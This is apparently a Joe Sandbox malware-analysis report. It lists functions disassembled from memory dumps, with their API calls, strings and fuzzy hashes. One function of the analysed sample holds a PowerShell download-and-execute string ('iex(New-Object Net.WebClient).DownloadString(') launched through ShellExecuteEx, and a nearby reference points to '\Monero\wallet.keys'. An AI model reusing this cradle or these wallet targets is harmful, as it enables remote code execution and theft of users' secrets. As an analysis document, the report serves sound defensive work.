Function 6C5905F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fa10259d50435642f56237d51c1f0e8a58ea6b86aea64d3e186b080517a2a94
Instruction ID: 4e01603148774e85e9eb6d00972c3f73241dd8588e05f14edcafc713ea825c5d
Opcode Fuzzy Hash: 5fa10259d50435642f56237d51c1f0e8a58ea6b86aea64d3e186b080517a2a94
Instruction Fuzzy Hash: 5EA14A70A01645CFDB14CF29C994A9AFBF1FF89314F448AAED44AA7B40E730A945CF90

Function 6C5E14A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C5E14C5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C5E14E2
GetCurrentThreadId.KERNEL32 ref: 6C5E1546
InitializeConditionVariable.KERNEL32(?), ref: 6C5E15BA
free.MOZGLUE(?), ref: 6C5E16B4

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
String ID:
API String ID: 1909280232-0
Opcode ID: a8971562f84d72b59e4f4e824cc72bbb7592b651f1ed0e8a1aed8820a5830a6c
Instruction ID: 41dfece55ae499ff17a761b21b88356bb08f275c2fb27972d67f800fe3b4930c
Opcode Fuzzy Hash: a8971562f84d72b59e4f4e824cc72bbb7592b651f1ed0e8a1aed8820a5830a6c
Instruction Fuzzy Hash: 2661DB32A00740DBDB118F25CC80BDEB7B4BF89308F45851DED8A67602DB31E999CB96

Function 6C5DDC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C5DDC60
AcquireSRWLockExclusive.KERNEL32(?,?,?,6C5DD38A,?), ref: 6C5DDC6F
free.MOZGLUE(?,?,?,?,?,6C5DD38A,?), ref: 6C5DDCC1
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C5DD38A,?), ref: 6C5DDCE9
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C5DD38A,?), ref: 6C5DDD05
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C5DD38A,?), ref: 6C5DDD4A

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 1842996449-0
Opcode ID: 6e64013208700f33ea5b7052db4e8873f2035195109dd70d0bcbbf5c665cc98c
Instruction ID: 8f8678d6bb636d1ae1207356ed0bcda7ee37c266094bb707193c4b0a284f79e3
Opcode Fuzzy Hash: 6e64013208700f33ea5b7052db4e8873f2035195109dd70d0bcbbf5c665cc98c
Instruction Fuzzy Hash: E84136B5A00706DFCB00CFA9C88099AB7B6FF89314B564569D945ABB20D771FC01CFA4

Function 003D9260 Relevance: 9.0, APIs: 4, Strings: 2, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(,?,?,?,003D140C,?,00E6ECE8,00000000), ref: 003D926C
lstrcpyn.KERNEL32(0060AB88,,,?,003D140C,?,00E6ECE8), ref: 003D9290
lstrlen.KERNEL32(?,?,003D140C,?,00E6ECE8), ref: 003D92A7
wsprintfA.USER32 ref: 003D92C7

Strings

, xrefs: 003D9268, 003D9283, 003D9287, 003D9299, 003D92BD, 003D927B, 003D926B, 003D9286, 003D928A, 003D92C6
%s%s, xrefs: 003D92B5

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s$
API String ID: 1206339513-2079566551
Opcode ID: 848e813383562c9cb830f6c61b9df5c095f71945942e71d7add3a43c24b9f881
Instruction ID: 9c1468b002c6dcb168a4e455c8c061b16321e210f27a5fa82b9f684acd1d812e
Opcode Fuzzy Hash: 848e813383562c9cb830f6c61b9df5c095f71945942e71d7add3a43c24b9f881
Instruction Fuzzy Hash: 32010C75540208FFCB04DFECD984EAE7BBAEB44390F108548F9098B340C771AA40DB91

Function 6C5BF440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C5BF480

Part of subcall function 6C58F100: LoadLibraryW.KERNEL32(shell32,?,6C5FD020), ref: 6C58F122
Part of subcall function 6C58F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C58F132

CloseHandle.KERNEL32(00000000), ref: 6C5BF555

Part of subcall function 6C5914B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C591248,6C591248,?), ref: 6C5914C9
Part of subcall function 6C5914B0: memcpy.VCRUNTIME140(?,6C591248,00000000,?,6C591248,?), ref: 6C5914EF

Part of subcall function 6C58EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C58EEE3

CreateFileW.KERNEL32 ref: 6C5BF4FD
GetFileInformationByHandle.KERNEL32(00000000), ref: 6C5BF523

Strings

\oleacc.dll, xrefs: 6C5BF4CB

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
String ID: \oleacc.dll
API String ID: 2595878907-3839883404
Opcode ID: c03c1d3a8d19e73081c12031003725ca0bbeb4f00bd3af09a380f7d04dc00e16
Instruction ID: e74f5dd2a36e5829ec57ce50367b5ed9773611f85cbce21f0eb3922ff97ac1c4
Opcode Fuzzy Hash: c03c1d3a8d19e73081c12031003725ca0bbeb4f00bd3af09a380f7d04dc00e16
Instruction Fuzzy Hash: 6C41A2346087509FE720DF29CD94A9BB7F4AF84318F104B1CF595A3691EB70D9898B92

Function 003D2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00E69F38,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

ShellExecuteEx.SHELL32(0000003C), ref: 003D2D85

Strings

')", xrefs: 003D2CB3
<, xrefs: 003D2D39
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 003D2D04
-nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 003D2CC4

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 3031569214-898575020
Opcode ID: f7f352f75e8df40c20f6e1805521f7297048ef41086eda1517d9a35d6adaa19a
Instruction ID: 9f0c8c3865e894a1800156ac6a175a37f57146c2f417de675a824fd9e9568da1
Opcode Fuzzy Hash: f7f352f75e8df40c20f6e1805521f7297048ef41086eda1517d9a35d6adaa19a
Instruction Fuzzy Hash: 2B410372C006489ADB1AFFA0E991BDDBB74AF10300F40411AF406BF291DF742A4ADF95

Function 6C5E74A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000000), ref: 6C5E7526
__Init_thread_footer.LIBCMT ref: 6C5E7566
__Init_thread_footer.LIBCMT ref: 6C5E7597

Strings

UnmapViewOfFile2, xrefs: 6C5E7552
kernel32.dll, xrefs: 6C5E7557

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: Init_thread_footer$ErrorLast
String ID: UnmapViewOfFile2$kernel32.dll
API String ID: 3217676052-1401603581
Opcode ID: f7d224a9181947d1d926d3236132b3a88d6442cdcb21dfc3d5bfa07d889918c9
Instruction ID: f09d2bf691c3e35109e409652d4839294ce5c5f45eda1ce618763420410ba911
Opcode Fuzzy Hash: f7d224a9181947d1d926d3236132b3a88d6442cdcb21dfc3d5bfa07d889918c9
Instruction Fuzzy Hash: E721C531700501EBDB18CFAAAE94E593775EB8A3A6F04452DE405A7B41D731AC02CA9F

Function 6C5EC410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C5EC0E9), ref: 6C5EC418
GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C5EC437
FreeLibrary.KERNEL32(?,6C5EC0E9), ref: 6C5EC44C

Strings

NtQueryVirtualMemory, xrefs: 6C5EC431
ntdll.dll, xrefs: 6C5EC413

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtQueryVirtualMemory$ntdll.dll
API String ID: 145871493-2623246514
Opcode ID: 7b5011dddbd8e816e46c30a96003f1ede210abe32541a84da334e6268988f2fd
Instruction ID: bad1afc21449ff4261ebd38c2b005f165138a75a10a1eb25326b320ab73b4d53
Opcode Fuzzy Hash: 7b5011dddbd8e816e46c30a96003f1ede210abe32541a84da334e6268988f2fd
Instruction Fuzzy Hash: 69E092707013019BDB00AB738B88B527FF8B74A685F10811EAA04B1650EBB0D0028A5E

Function 003C9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?), ref: 003C9F41

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Strings

@, xrefs: 003C9EF1
v20, xrefs: 003C9E21
v10, xrefs: 003C9EA3
ERROR_RUN_EXTRACTOR, xrefs: 003C9E67

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocLocal
String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
API String ID: 4171519190-1096346117
Opcode ID: d81ae638a60afb5da2c2fd73eadbacdc88b1cba3fdb376909d4c20d0dd2f0585
Instruction ID: 5cd336e2a218c469228bf3bc7886378523ab51b0827836693a9ab4e86264dc6d
Opcode Fuzzy Hash: d81ae638a60afb5da2c2fd73eadbacdc88b1cba3fdb376909d4c20d0dd2f0585
Instruction Fuzzy Hash: 6F617D71A1025CABDB25EFA4DD96FED7779AF41344F008118F90A9F281EBB06E05CB52

Function 6C591530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(-00000002,?,6C59152B,?,?,?,?,6C591248,?), ref: 6C59159C
memcpy.VCRUNTIME140(00000023,?,?,?,?,6C59152B,?,?,?,?,6C591248,?), ref: 6C5915BC
moz_xmalloc.MOZGLUE(-00000001,?,6C59152B,?,?,?,?,6C591248,?), ref: 6C5915E7
free.MOZGLUE(?,?,?,?,?,?,6C59152B,?,?,?,?,6C591248,?), ref: 6C591606
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C59152B,?,?,?,?,6C591248,?), ref: 6C591637

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
String ID:
API String ID: 733145618-0
Opcode ID: 55cdbf01fd3fb6aa27196e77cd0fcca6e76703cdd88c933f9ded73a4effa7569
Instruction ID: b640818f5fe23681829ba9097e667fb92a8420a29b561c244579dbeb5c4b8a62
Opcode Fuzzy Hash: 55cdbf01fd3fb6aa27196e77cd0fcca6e76703cdd88c933f9ded73a4effa7569
Instruction Fuzzy Hash: A031D871A041648BCB18CE78DD5086F77ADEB813647690BADE423DBBD4FB30D9058791

Function 6C5EAD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C5FE330,?,6C5AC059), ref: 6C5EAD9D

Part of subcall function 6C59CA10: malloc.MOZGLUE(?), ref: 6C59CA26

memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C5FE330,?,6C5AC059), ref: 6C5EADAC
free.MOZGLUE(?,?,?,?,00000000,?,?,6C5FE330,?,6C5AC059), ref: 6C5EAE01
GetLastError.KERNEL32(?,00000000,?,?,6C5FE330,?,6C5AC059), ref: 6C5EAE1D
GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C5FE330,?,6C5AC059), ref: 6C5EAE3D

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: ErrorLast$freemallocmemsetmoz_xmalloc
String ID:
API String ID: 3161513745-0
Opcode ID: b78d68c0baa6ae112b8bf3ba58945f149d7c8cacd59f81eb8c85c9715084eb64
Instruction ID: eb71abe566c5ca254b03ebaeac722e133bc5c7da6b985ef08ad09ee42a455fde
Opcode Fuzzy Hash: b78d68c0baa6ae112b8bf3ba58945f149d7c8cacd59f81eb8c85c9715084eb64
Instruction Fuzzy Hash: 633152B1A002159FDB14DF758D44AABBBF8EF89614F15882DE85AE7700E734EC05CBA4

Function 6C58B4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 6C58B532
moz_xmalloc.MOZGLUE(?), ref: 6C58B55B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C58B56B
wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C58B57E
free.MOZGLUE(00000000), ref: 6C58B58F

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
String ID:
API String ID: 4244350000-0
Opcode ID: 2f949b4ff93e3d4871650a0c080361eac096dfa2d4cda43fd89a757941fb9087
Instruction ID: 58e921c5db49b1041031797e529651dc8fe9ed57275ae2a3808c3d87eead3c95
Opcode Fuzzy Hash: 2f949b4ff93e3d4871650a0c080361eac096dfa2d4cda43fd89a757941fb9087
Instruction Fuzzy Hash: A521F871A012159BDB00DF69CC80BAABBB9FF86304F244169E914DB382F735D911C7A1

Function 6C5C0D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C583DEF), ref: 6C5C0D71
VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C583DEF), ref: 6C5C0D84
VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C583DEF), ref: 6C5C0DAF

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C5C0D97, 6C5C0DBE
<jemalloc>, xrefs: 6C5C0D92, 6C5C0DB9

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 1852963964-2186867486
